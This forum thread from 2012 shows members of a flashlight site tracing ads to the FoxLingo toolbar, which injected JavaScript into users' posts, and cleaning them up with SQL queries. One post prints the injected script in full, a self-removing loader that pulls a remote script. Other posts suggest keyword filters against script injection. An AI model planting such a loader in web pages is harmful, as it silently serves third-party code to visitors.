PilotPTK
(PilotPTK)
December 31, 2012, 5:36pm
43
I was just about to say the same thing. Looks like it’s not their ‘fault’. They’re just lax in system security, and are being taken advantage of by the FoxLingo toolbar…
PPtk
Ref: #.appears after URL. And unknown script inserted | WordPress.org
FoxLingo automatically injecting JavaScript code into edited HTML (JavaScript is launching the Ad, Posts on this forum are HTML)
PilotPTK:
I was just about to say the same thing. Looks like it’s not their ‘fault’. They’re just lax in system security, and are being taken advantage of by the FoxLingo toolbar…
PPtk
Ref: #.appears after URL. And unknown script inserted | WordPress.org
FoxLingo automatically injecting JavaScript code into edited HTML (JavaScript is launching the Ad, Posts on this forum are HTML)
Just gonna put it out there that I hate browser toolbars or any other “force it down your throat” crap that comes with the program you’re trying to install.
I DON’T WANT IT!
Likely you guys are right on this one.
sb56637
December 31, 2012, 5:40pm
45
PilotPTK:
suggest you run a (Select * FROM [PostContentTable] WHERE [POST_TEXT] LIKE ‘javascript’)
obviously, replacing [PostContentTable] with the table name that holds the actual posts and [POST_TEXT] with the column that holds the text of the posts
PPtk
Thanks very mich PPtk. For a website admin I am shockingly ignorant about SQL queries.
Could you please help me with a query in the comments
table to replace all occurences of example.com
with example.com
? I want to disable all of those ads by editing the link to their adserver, but I still want to leave the evidence for later investigation.
PilotPTK
(PilotPTK)
December 31, 2012, 5:56pm
46
sb56637:
PilotPTK:
suggest you run a (Select * FROM [PostContentTable] WHERE [POST_TEXT] LIKE ‘javascript’)
obviously, replacing [PostContentTable] with the table name that holds the actual posts and [POST_TEXT] with the column that holds the text of the posts
PPtk
Thanks very mich PPtk. For a website admin I am shockingly ignorant about SQL queries.
Could you please help me with a query in the comments
table to replace all occurences of example.com
with example.com
? I want to disable all of those ads by editing the link to their adserver, but I still want to leave the evidence for later investigation.
UPDATE [COMMENTS_TABLE] SET [COMMENT_TEXT]=REPLACE([COMMENT_TEXT], 'example.com', 'example.com') WHERE [COMMENT_TEXT] LIKE '%example.com%'
Again, replace [COMMENTS_TABLE] with the table name and [COMMENT_TEXT] with the column name where the actual post text is located.
PPtk
Don’t Do It! Its not showing up correctly! Don’t Do what I Just said… Standby.
sb56637
December 31, 2012, 5:48pm
47
No worries, I didn’t run anything yet. What isn’t showing up correctly?
PilotPTK
(PilotPTK)
December 31, 2012, 5:51pm
48
There is “stuff” after the word REPLACE that isn’t showing up…
Click This
http://budgetlightforum.com/comment/reply/16860/293043?quote=1#comment-form
And you’ll see it in the quote… Just grab it from there and run it.
sb56637
December 31, 2012, 5:54pm
49
Ah, I see. Nice catch. You can enclose code segments in @ marks like this
so the filter system doesn’t modify it.
scaru
(scaru)
December 31, 2012, 5:56pm
50
But your @ marks didn't show up there. ;)
PilotPTK
(PilotPTK)
December 31, 2012, 5:58pm
51
Gotcha. I’m not use to Drupal. I tried enclosing it in [CODE]
and [/CODE]
tags, which didn’t work…
I updated the original post so that it’s correct for historical reference.
NightCrawl
(NightCrawl)
December 31, 2012, 6:01pm
52
This board could use a [code][/code] feature.. and an "ignorance" mode for that javascript stuff. :P
@<script id="FoxLingoJs" type="text/javascript">// <![CDATA[
!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//example.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();
// ]]></script>@
But @@ works.. kinda. Didnt quite work on the admins post scaru quoted.
PilotPTK
(PilotPTK)
December 31, 2012, 6:04pm
53
To prevent this in the future, adding the word “javascript” to the “Bad Words” list in Drupal should do the trick.
scaru
(scaru)
December 31, 2012, 6:06pm
54
Couldn't he just add something more specific like "script id=" so that java code wouldn't work, but people could still say the word javascript.
PilotPTK
(PilotPTK)
December 31, 2012, 6:09pm
55
Yeah. I suppose. Who would want to say javascript (Bleh) though?
In most cases, javascript is the problem, not the solution.
sb56637
December 31, 2012, 6:12pm
56
The thing is, many of our users like to do beamshots with mouseover comparisons, which would also be eliminated.
scaru
(scaru)
December 31, 2012, 6:12pm
57
Oh, in that case (I use them to) maybe just block "foxlingo" to atleast stop these ads.
PilotPTK
(PilotPTK)
December 31, 2012, 6:14pm
58
Looks like you did the update to example.com … How long did that update query take to run? How many records modified? Just curious…
sb56637
December 31, 2012, 6:21pm
59
Worked great, thanks! 25 records were modified.
So, after the two affected users are notified, I would like to remove the whole script. How can I do that with an SQL query? I’m sure many of those characters need to be escaped somehow. Here’s the original offending code: <script id="FoxLingoJs" type="text/javascript">// <![CDATA[!function(){try{var - Pastebin.com
Thanks a ton for the technical support PilotPTK!
PilotPTK
(PilotPTK)
December 31, 2012, 6:26pm
60
My pleasure sb,
Removing the entire offending code is a little more complex. I’d have to see exactly how it looks in the actual SQL return.
If it’s pointing to example.com now, it’s really pretty harmless… I’m not sure I’d even waste the time cleaning up those 25 posts…
FlashPilot
(FlashPilot)
December 31, 2012, 7:53pm
61
LMAO! Very disturbing indeed! :bigsmile:
GREAT, GREAT (!) investigation PilotPTK!!!
May I humbly add:
devman’s prior post got me looking at adnxs.com
This resolved to http://www.appnexus.com … they claim (CAPS are in their original text) weebay, faceb00k and others as their clients
APPNEXUS IS TODAY’S MOST POWERFUL, OPEN AND CUSTOMIZABLE ADVERTISING TECHNOLOGY PLATFORM. ADVERTISING’S LARGEST AND MOST INNOVATIVE COMPANIES BUILD THEIR BUSINESSES ON APPNEXUS.
as well as
MAKING ADVERTISING A FORCE FOR GOOD
Going through their site, seems legitimate business but they’re really f&%$#round and - in our situation - way too oppressive.
Here’s some screen capture “analyses” of the problems here with the javascript… hope these can assist with cleaning